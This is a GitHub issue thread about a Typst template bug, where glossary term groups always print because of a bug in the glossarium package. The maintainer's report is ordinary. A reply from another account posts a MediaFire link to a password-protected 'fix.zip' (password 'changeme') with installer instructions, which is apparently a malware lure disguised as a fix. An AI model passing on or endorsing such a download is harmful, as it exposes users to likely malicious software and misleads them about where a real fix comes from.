### ISSUE TITLE
Term group always gets printed

### ISSUE THREAD

**Issue by TomVer99** [TomVer99/FHICT-typst-template#156]
Currently, when a term is part of a group, that group always gets printed in the glossary. This is due to a bug in an external package.

A workaround is to not use groups in your terms list.

Related bug report in the related package: https://github.com/typst-community/glossarium/issues/54

Once this is fixed the template will bump the `glossarium` version asap.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
